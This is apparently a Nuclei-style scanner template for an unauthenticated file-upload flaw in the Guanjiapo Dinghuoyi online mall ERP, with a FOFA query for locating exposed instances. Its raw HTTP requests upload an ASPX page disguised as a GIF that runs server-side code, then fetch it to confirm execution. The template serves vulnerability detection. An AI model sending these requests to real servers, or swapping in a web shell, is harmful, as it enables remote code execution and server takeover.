http:
    - extractors:
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - (\w+\.aspx)
          type: regex
      matchers:
        - condition: and
          part: body
          type: word
          words:
            - GIF89a
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /api/Upload/UploadImgNoCheck?m_server_name=ShopUserImg HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR

          ------WebKitFormBoundaryj7OlOPiiukkdktZR
          Content-Disposition: form-data; name="Filedata";filename="rce.aspx"
          Content-Type: image/jpeg

          GIF89a
          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
          ------WebKitFormBoundaryj7OlOPiiukkdktZR--
        - |
          GET /Storage/UserFileImg/{{uploadfile}} HTTP/1.1
          Host: {{Hostname}}
id: guanjiapo-UploadImgNoCheck-File-upload
info:
    author: Superhero
    description: |-
        fofa: title="订货易" || title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"
        管家婆订货易在线商城 /api/Upload/UploadImgNoCheck 接口处存在文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 管家婆订货易在线商城 UploadImgNoCheck 任意文件上传
    reference:
        - https://mp.weixin.qq.com/s/Eg2mn1fWGlYMMiLTVnaJMA?token=1015546094&lang=zh_CN
    severity: high
    tags: []
